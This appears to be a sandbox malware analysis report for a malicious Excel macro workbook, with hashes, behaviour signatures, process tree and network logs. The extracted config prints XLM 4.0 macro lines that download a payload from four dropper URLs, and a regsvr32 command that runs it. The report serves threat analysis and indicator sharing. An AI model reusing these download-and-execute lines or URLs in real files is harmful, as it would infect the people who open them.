Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

d199da473a...9.xlsm

windows7-x64

10

d199da473a...9.xlsm

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/11/2024, 18:32 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d199da473ad0ca2e5210cce716cf6f5600e505de3f6f19112130263f8f5bb229.xlsm

  • Size

    46KB

  • MD5

    579c1627bdee879bb4e208e035258469

  • SHA1

    5e024ea700e5e38f430cfced731cb5fe5bbe5eab

  • SHA256

    d199da473ad0ca2e5210cce716cf6f5600e505de3f6f19112130263f8f5bb229

  • SHA512

    29e59dbad8ce2a1658dac06ffa3f63b90ddf2b9168f844fb06efba06e3554228d03a2ad0899efaf836ab26ec62d8f13c9edff7040e286059e50be6597c426812

  • SSDEEP

    768:cwLvfWDOevZCwrvtrDPzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VfskoM:1WDzftT5fTR4Lh1NisFYBc3cr+UqVfD9

Score
10/10
discovery

Malware Config

Extracted

Language
xlm4.0
Source
1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://congresoapp2021.com/u07di/wkdehSgS/", "..\cre.ocx")
2
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://forocavialpa.com/wp-admin/bnFI6WhjZkffrb/", "..\cre.ocx")
3
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://s1.techopesolutions.com/semicanal/g7jRfFqphhUQ5oh/", "..\cre.ocx")
4
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://tournhatrang.asia/cgi-bin/2gnqrN/", "..\cre.ocx")
URLs
xlm40.dropper

http://congresoapp2021.com/u07di/wkdehSgS/
xlm40.dropper

http://forocavialpa.com/wp-admin/bnFI6WhjZkffrb/
xlm40.dropper

http://s1.techopesolutions.com/semicanal/g7jRfFqphhUQ5oh/
xlm40.dropper

http://tournhatrang.asia/cgi-bin/2gnqrN/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\d199da473ad0ca2e5210cce716cf6f5600e505de3f6f19112130263f8f5bb229.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:920
    • C:\Windows\SysWow64\regsvr32.exe
      C:\Windows\SysWow64\regsvr32.exe /s ..\cre.ocx
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      PID:3108

Network

  • flag-us
    DNS
    232.168.11.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.168.11.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    roaming.officeapps.live.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    roaming.officeapps.live.com
    IN A
    Response
    roaming.officeapps.live.com
    IN CNAME
    prod.roaming1.live.com.akadns.net
    prod.roaming1.live.com.akadns.net
    IN CNAME
    eur.roaming1.live.com.akadns.net
    eur.roaming1.live.com.akadns.net
    IN CNAME
    weu-azsc-000.roaming.officeapps.live.com
    weu-azsc-000.roaming.officeapps.live.com
    IN CNAME
    osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com
    osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com
    IN A
    52.109.89.19
  • flag-nl
    POST
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    EXCEL.EXE
    Remote address:
    52.109.89.19:443
    Request
    POST /rs/RoamingSoapService.svc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: text/xml; charset=utf-8
    User-Agent: MS-WebServices/1.0
    SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
    Content-Length: 511
    Host: roaming.officeapps.live.com
    Response
    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-IIS/10.0
    X-OfficeFE: RoamingFE_IN_105
    X-OfficeVersion: 16.0.18311.30577
    X-OfficeCluster: weu-000.roaming.officeapps.live.com
    Content-Security-Policy-Report-Only: script-src 'nonce-WMNPRMeG+lM889AzT3nUG0ybz5cksKOcCKmL2P9d8au+tLAZ3qKrT70qqa/hPiyYBvrQkjTxNTJ1XNFoF1kWKzm0Ic+m8xRE2C0tL+gIBzq6D6TRaW5hxusUo+L+uEm3wXnkPFVslQWtA6UsSq57itC2ooZhj/TVxLWdDB6aMQg=' 'unsafe-inline' 'unsafe-eval' 'strict-dynamic' https:; base-uri 'self'; object-src 'none'; require-trusted-types-for 'script'; report-uri https://csp.microsoft.com/report/OfficeIce-OfficeRoaming-Prod
    X-CorrelationId: 7be76852-9fd1-4c53-b8ff-997f010bb31a
    X-Powered-By: ASP.NET
    Date: Wed, 20 Nov 2024 18:32:11 GMT
    Content-Length: 654
  • flag-us
    DNS
    18.89.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.89.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    19.89.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    19.89.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    congresoapp2021.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    congresoapp2021.com
    IN A
    Response
  • flag-us
    DNS
    forocavialpa.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    forocavialpa.com
    IN A
    Response
  • flag-us
    DNS
    s1.techopesolutions.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    s1.techopesolutions.com
    IN A
    Response
  • flag-us
    DNS
    tournhatrang.asia
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    tournhatrang.asia
    IN A
    Response
    tournhatrang.asia
    IN A
    199.59.243.227
  • flag-us
    GET
    http://tournhatrang.asia/cgi-bin/2gnqrN/
    EXCEL.EXE
    Remote address:
    199.59.243.227:80
    Request
    GET /cgi-bin/2gnqrN/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: tournhatrang.asia
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    date: Wed, 20 Nov 2024 18:32:12 GMT
    content-type: text/html; charset=utf-8
    content-length: 1074
    x-request-id: e91f66a1-36f2-4681-ad83-3cdc885f977b
    cache-control: no-store, max-age=0
    accept-ch: sec-ch-prefers-color-scheme
    critical-ch: sec-ch-prefers-color-scheme
    vary: sec-ch-prefers-color-scheme
    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZMvkWldFIWhQUhrVPwDDPhrtAc4+VmN6eWb4lixn9pcCtjVpYRVQeH7+BbB6uazERE7x+4FuBd14DIfPfLDCdQ==
    set-cookie: parking_session=e91f66a1-36f2-4681-ad83-3cdc885f977b; expires=Wed, 20 Nov 2024 18:47:13 GMT; path=/
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    76.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    76.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    227.243.59.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    227.243.59.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    30.73.42.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    30.73.42.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    154.239.44.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    154.239.44.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    197.87.175.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    197.87.175.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    41.110.86.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    41.110.86.104.in-addr.arpa
    IN PTR
    Response
    41.110.86.104.in-addr.arpa
    IN PTR
    a104-86-110-41deploystaticakamaitechnologiescom
  • flag-us
    DNS
    102.209.201.84.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    102.209.201.84.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    43.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.229.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    14.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    123.10.44.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    123.10.44.20.in-addr.arpa
    IN PTR
    Response
  • 52.109.89.19:443
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    tls, http
    EXCEL.EXE
    1.8kB
     8.2kB
     12
    11

    HTTP Request

    POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

    HTTP Response

    200
  • 199.59.243.227:80
    http://tournhatrang.asia/cgi-bin/2gnqrN/
    http
    EXCEL.EXE
    962 B
     2.4kB
     14
    6

    HTTP Request

    GET http://tournhatrang.asia/cgi-bin/2gnqrN/

    HTTP Response

    200
  • 8.8.8.8:53
    232.168.11.51.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    232.168.11.51.in-addr.arpa

  • 8.8.8.8:53
    roaming.officeapps.live.com
    dns
    EXCEL.EXE
    73 B
     247 B
     1
    1

    DNS Request

    roaming.officeapps.live.com

    DNS Response

    52.109.89.19

  • 8.8.8.8:53
    18.89.109.52.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    18.89.109.52.in-addr.arpa

  • 8.8.8.8:53
    19.89.109.52.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    19.89.109.52.in-addr.arpa

  • 8.8.8.8:53
    congresoapp2021.com
    dns
    EXCEL.EXE
    65 B
     138 B
     1
    1

    DNS Request

    congresoapp2021.com

  • 8.8.8.8:53
    forocavialpa.com
    dns
    EXCEL.EXE
    62 B
     135 B
     1
    1

    DNS Request

    forocavialpa.com

  • 8.8.8.8:53
    s1.techopesolutions.com
    dns
    EXCEL.EXE
    69 B
     127 B
     1
    1

    DNS Request

    s1.techopesolutions.com

  • 8.8.8.8:53
    tournhatrang.asia
    dns
    EXCEL.EXE
    63 B
     79 B
     1
    1

    DNS Request

    tournhatrang.asia

    DNS Response

    199.59.243.227

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    76.32.126.40.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    76.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    227.243.59.199.in-addr.arpa
    dns
    73 B
     131 B
     1
    1

    DNS Request

    227.243.59.199.in-addr.arpa

  • 8.8.8.8:53
    30.73.42.20.in-addr.arpa
    dns
    70 B
     156 B
     1
    1

    DNS Request

    30.73.42.20.in-addr.arpa

  • 8.8.8.8:53
    154.239.44.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    154.239.44.20.in-addr.arpa

  • 8.8.8.8:53
    197.87.175.4.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    197.87.175.4.in-addr.arpa

  • 8.8.8.8:53
    206.23.85.13.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    206.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    41.110.86.104.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    41.110.86.104.in-addr.arpa

  • 8.8.8.8:53
    102.209.201.84.in-addr.arpa
    dns
    73 B
     133 B
     1
    1

    DNS Request

    102.209.201.84.in-addr.arpa

  • 8.8.8.8:53
    43.229.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    43.229.111.52.in-addr.arpa

  • 8.8.8.8:53
    14.227.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    14.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    123.10.44.20.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    123.10.44.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\cre.ocx
    Filesize

    1KB

    MD5

    a8430ebe08b0484772abadf309fcfdd3

    SHA1

    cf1a4106c54cc7e6ea8e9ca7553e5a809cdff1ee

    SHA256

    f4af8eae16a063421c13aae9c3931988f049ad5faa879ad2bc8e1d7f74d636c2

    SHA512

    7b7c75488d6963336c1895f18ea6645fbe6cff23567c040533fd7f49238135c80ad6d591506182b9183e94b8767aa7c0ee0414a2ca69c1d857f5faf52c2e9d6e

    Download Submit

  • memory/920-8-0x00007FF885CB0000-0x00007FF885EA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/920-12-0x00007FF885CB0000-0x00007FF885EA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/920-1-0x00007FF885D4D000-0x00007FF885D4E000-memory.dmp

    Filesize

    4KB

    Download

  • memory/920-0-0x00007FF845D30000-0x00007FF845D40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/920-6-0x00007FF885CB0000-0x00007FF885EA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/920-5-0x00007FF885CB0000-0x00007FF885EA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/920-7-0x00007FF845D30000-0x00007FF845D40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/920-9-0x00007FF885CB0000-0x00007FF885EA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/920-10-0x00007FF843660000-0x00007FF843670000-memory.dmp

    Filesize

    64KB

    Download

  • memory/920-3-0x00007FF845D30000-0x00007FF845D40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/920-4-0x00007FF845D30000-0x00007FF845D40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/920-14-0x00007FF885CB0000-0x00007FF885EA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/920-11-0x00007FF885CB0000-0x00007FF885EA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/920-16-0x00007FF885CB0000-0x00007FF885EA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/920-17-0x00007FF885CB0000-0x00007FF885EA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/920-15-0x00007FF885CB0000-0x00007FF885EA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/920-13-0x00007FF843660000-0x00007FF843670000-memory.dmp

    Filesize

    64KB

    Download

  • memory/920-2-0x00007FF845D30000-0x00007FF845D40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/920-32-0x00007FF885CB0000-0x00007FF885EA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/920-33-0x00007FF885D4D000-0x00007FF885D4E000-memory.dmp

    Filesize

    4KB

    Download

  • memory/920-34-0x00007FF885CB0000-0x00007FF885EA5000-memory.dmp

    Filesize

    2.0MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.